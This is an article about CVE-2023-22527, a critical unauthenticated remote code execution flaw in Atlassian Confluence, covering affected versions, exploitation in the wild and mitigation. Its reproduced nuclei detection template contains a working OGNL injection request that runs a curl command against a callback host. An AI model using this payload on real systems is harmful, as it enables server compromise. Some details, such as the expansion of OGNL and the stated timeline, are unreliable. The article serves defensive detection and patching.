CVE-2023-22527 - A Critical Remote Code Execution Vulnerability in Atlassian Confluence

Atlassian disclosed a critical remote code execution (RCE) vulnerability in their collaboration software Confluence on January 16, 2024. Designated as CVE-2023-22527, this vulnerability posed a serious risk to any outdated and unpatched Confluence instances that were exposed to the internet. With a CVSS severity score of 10.0, this vulnerability is considered critical due to the ease of exploitability and potential for complete system compromise without authentication.

Background on Atlassian Confluence

Atlassian Confluence is a widely used enterprise wiki and collaboration software. It allows teams to create and share documents, meeting notes, project updates and more. Confluence Server and Confluence Data Center are the on-premise versions that many large organizations rely on for internal knowledge sharing and documentation. According to the vendor, over 225,000 companies and organizations use Confluence globally across various industries.

Given its popularity and the type of sensitive internal information often stored within Confluence wikis, the software is an attractive target for cyberattacks. Any vulnerability that can be exploited without authentication, like CVE-2023-22527, poses a serious risk for data theft, ransomware attacks, and other malicious objectives.

Discovery and Technical Details

CVE-2023-22527 was discovered via Atlassian's bug bounty program after they had already addressed another vulnerability, CVE-2023-22522, in early December 2023 according to Help Net Security. When patching for CVE-2023-22522, Atlassian also applied additional planned security updates which ultimately mitigated this new critical issue as well in Confluence versions 8.5.4 LTS and later.

The vulnerability is classified as a template injection issue that allows an unauthenticated remote attacker to achieve remote code execution on affected Confluence servers and data centres. By leveraging certain Velocity template files that accept template parameters and pass them to insecure deserialisation sinks like $ognl.findValue(), an attacker can inject OGNL (Object-Oriented Groovy) expressions to execute arbitrary commands on the target system.

Researchers at Project Discovery were able to identify the attack surface and validate exploitation after examining differences between older vulnerable versions and the patched 8.5.4 release via patch diffing. Specifically, they discovered template files like confluence/template/xhtml/pagelist.vm that directly pass parameter values to dangerous sinks without sanitization.

Scope of Impact

According to the advisory from Atlassian, the following versions of Confluence are affected by CVE-2023-22527:

  • Confluence Data Center and Server 8.0.x
  • Confluence Data Center and Server 8.1.x
  • Confluence Data Center and Server 8.2.x
  • Confluence Data Center and Server 8.3.x
  • Confluence Data Center and Server 8.4.x
  • Confluence Data Center and Server 8.5.0 to 8.5.3

Meanwhile, these versions are considered not affected:

  • Confluence Data Center and Server 8.5.4 and later
  • Confluence Data Center 8.6.2 and later
  • Confluence Data Center 8.7.1 and later

Any outdated Confluence instances running vulnerable versions that were exposed to unauthorized access on the internet were at serious risk of remote exploit via this issue. Given its unauthenticated nature and potential for remote code execution, CVE-2023-22527 poses a critical threat.

Detection of Exploitation Attempts

A few weeks after disclosure, the Shadowserver Foundation reported seeing active exploitation attempts against vulnerable Confluence servers starting on January 19, 2024. They noticed traffic signatures characteristic of CVE-2023-22527 exploitation, like request patterns and specific URLs.

Monitoring organization SocPrime also detected maximum severity exploits of this vulnerability in the wild using their sensor network and shared YARA rules to detect the issue. The speed at which threat actors moved to take advantage of this critical RCE bug underscores the importance of patching or mitigating such vulnerabilities rapidly.

It's likely unspecified scanning for and targeting of exposed vulnerable Confluence deployments continued in underground communities. However, without published indicators of compromise, detection mainly relied on emerging exploit traffic patterns and payload matching. Full remediation through updating remains the safest approach against any potential intrusions.

Technical Write-Ups and Proof of Concept Code

Technical details on how to validate and replicate exploitation of CVE-2023-22527 started surfacing online. Researchers at Project Discovery published an analysis breaking down the deserialization vulnerability in Confluence's Velocity templating engine that allowed remote code execution.

There are several proof of concept (POC) Python scripts demonstrating how an unauthenticated attacker could achieve arbitrary command execution simply by specifying a custom URL parameter. This public release of exploitation methodology and code precipitates further targeting of unpatched servers.

Ongoing Monitoring and Follow-Up Activity

The team over at Project Discovery have created a nuclei template to detect this CVE and added into nuclei-templates project - https://github.com/projectdiscovery/nuclei-templates/pull/8982

Nuclei template to detect CVE-2023-22527 on Atlassian Confluence instances:

id: CVE-2023-22527

info:
  name: Atlassian Confluence - Remote Code Execution
  author: iamnooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
    Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
  reference:
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
    - https://jira.atlassian.com/browse/CONFSERVER-93833
    - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-22527
    epss-score: 0.00044
    epss-percentile: 0.08115
    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: confluence_data_center
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2023,confluence,rce,ssti

http:
  - raw:
      - |+
        POST /template/aui/text-inline.vm HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Content-Type: application/x-www-form-urlencoded

        label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Empty{name='

      - type: word
        part: interactsh_protocol
        words:
          - dns

To run the scan, either update the nuclei templates folder by pulling the latest updates from the official Github repository or create a template with the contents above and run nuclei scanner against it:

$ nuclei -target http://localhost -id CVE-2023-22527

Recommendations for Upgrading and Mitigation

In response to the disclosure, Atlassian strongly recommends all customers immediately upgrade any affected Confluence instances to the latest versions to patch the vulnerability. They also advised restricting external access as a temporary mitigation for those unable to update yet.

For organizations running vulnerable deployments, the solutions suggested were:

  • Upgrade to the latest supported version available - 8.5.4 LTS or higher
  • Take vulnerable systems offline or isolate from external networks
  • Back up instance data to an external secure location
  • Engage incident response teams to check for signs of compromise

While patching is the only complete remediation, disconnecting exposed systems from the internet can reduce the risk of exploit until an update is applied. Regular backups of data are also prudent in case recovery from any intrusion becomes necessary.